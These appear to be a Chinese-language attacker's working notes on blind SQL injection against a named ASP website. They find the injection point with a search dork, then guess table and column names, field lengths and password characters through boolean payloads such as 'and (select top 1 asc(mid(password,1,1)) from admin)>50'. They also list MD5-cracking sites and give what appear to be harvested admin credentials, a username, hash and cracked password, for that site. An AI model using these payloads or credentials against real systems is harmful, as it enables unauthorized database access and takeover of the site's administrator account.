先找注入点
inurl:asp?id=9
http://www.hsqs.com/tipsview.asp?id=9
猜表名 and (select count(*) from 表名)>0
猜列名 and (select count(列名) from 表名)>0
猜长度 and (select top 1 len(username) from admin)>5
username长 4
password长 16
猜内容 and (select top 1 asc(mid(password,1,1)) from admin)>50
asc码
username 120,117
__________________
www.md5.com.cn
www.xmd5.com
www.cmd5.com
猜表名 and (select count(*) from 表名)>0
猜列名 and (select count(列名) from 表名)>0
猜长度 and (select top 1 len(username) from admin)>5
username长 4
password长 16
猜内容 and (select top 1 asc(mid(password,1,1)) from admin)>50
asc码
username 120,117
常见表段
sysadmin admin administrator manger
[username] : hsqs1
[password] : 1f60163129f50b84 yingkesong1
______________
猜表名 and (select count(*) from sysadmin)>0
猜列名 and (select count(username) from sysadmin)>0
猜长度 and (select top 1 len(username) from sysadmin)>5
猜内容 and (select top 1 asc(mid(username,1,1)) from admin)>50
asc码
username 120,117
admin
username 5
password 16
104 115